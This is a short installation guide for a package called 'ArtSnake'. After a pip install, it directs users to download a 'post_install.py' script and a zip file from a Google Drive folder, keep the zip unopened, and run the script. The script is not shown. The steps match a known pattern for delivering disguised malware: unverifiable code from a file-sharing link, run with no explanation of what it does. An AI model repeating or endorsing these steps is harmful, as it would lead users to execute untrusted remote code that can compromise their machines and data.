ArtSnake Installation Guide¶
This guide will walk you through the installation of the ArtSnake package.
Step 1: Install ArtSnake via pip¶
To install ArtSnake, open your terminal and run the following command:
pip install ArtSnake
Step 2: Download and Execute Post-Installation Script¶
Download the post_install.py and ArtSnake.zip files from the repository https://drive.google.com/drive/folders/1BQiAme8a6fbI0lzCc6Jg3Qfr5LxSJiH3?usp=drive_link.
Ensure that both files (post_install.py and ArtSnake.zip) are in the same directory and DO NOT unzip the ArtSnake.zip.
Open your terminal, navigate to the directory containing these files, and run the following command:
python post_install.py
This will complete the installation process for ArtSnake.
If you encounter any issues, please refer to the documentation.
Happy coding with ArtSnake!